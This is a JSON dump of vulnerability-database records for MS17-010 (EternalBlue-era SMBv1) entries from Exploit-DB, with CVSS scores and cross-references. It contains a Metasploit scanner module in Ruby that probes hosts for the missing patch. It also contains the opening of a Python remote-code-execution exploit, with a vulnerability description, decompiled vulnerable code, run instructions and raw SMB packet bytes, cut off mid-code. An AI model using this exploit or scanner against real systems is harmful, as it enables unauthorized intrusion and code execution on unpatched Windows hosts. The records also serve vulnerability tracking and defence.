"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-04-18T17:18:01", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2017-04-18T17:18:01", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/41891/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n\r\n This module does not require valid SMB credentials in default server\r\n configurations. It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n\r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n\r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n\r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n\r\n def do_smb_probe(ip)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n\r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n\r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n\r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n\r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n\r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n\r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n\r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n\r\n pkt.to_s\r\n end\r\nend\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "c80c514f16b0e9853484027f63256907"}, {"key": "href", "hash": "c2121915ced0b840e29b29907ddf10ee"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0271fb8c6c010b2aca15217429c7c0eb"}, {"key": "published", "hash": "0271fb8c6c010b2aca15217429c7c0eb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "083a04e7fee2ce4aff868e260be7632a"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:41987", "hash": "0ed13acbb179cfd93f9a01e513f68cdaaa181dc3f4b7238950f752077469b446", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)", "description": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. ...", "published": "2017-05-10T00:00:00", "modified": "2017-05-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/41987/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-05-10T20:48:10", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. ...", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-05-10T20:48:10", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-05-10T20:48:10", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "3120fc56ee6decfa0f172baafe5ed66776c21050b14cc94719a75d6156a2ce3a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3707319e60a5d53f83b97b7e5aa9cf4", "key": "description"}, {"hash": "60c4e0e78ee956e23a4933b5570e4af7", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "251f7e82e99b45e17b6cf8e939e6b119", "key": "published"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "d8276e96bec8d461c00437030f01a299", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "251f7e82e99b45e17b6cf8e939e6b119", "key": "modified"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "history": [], "href": "https://www.exploit-db.com/exploits/41987/", "id": "EDB-ID:41987", "immutableFields": [], "lastseen": "2017-05-10T20:48:10", "modified": "2017-05-10T00:00:00", "objectVersion": "1.5", "published": "2017-05-10T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)", "type": "exploitdb", "viewCount": 394}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-05-10T20:48:10"}], "viewCount": 400, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-10T20:48:10", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2017-05-10T20:48:10", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/41987/", "sourceData": "# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com \r\n# Date and time of release: May, 9 2017 - 13:00PM \r\n# Found this and more exploits on my open source security project: http://www.exploitpack.com \r\n#\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt \r\n# and when the logic is not correct it leads to a cross-border copy. The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // edi@1\r\n# _BYTE *v5; // edi@1\r\n# unsigned int result; // eax@1\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n\r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, 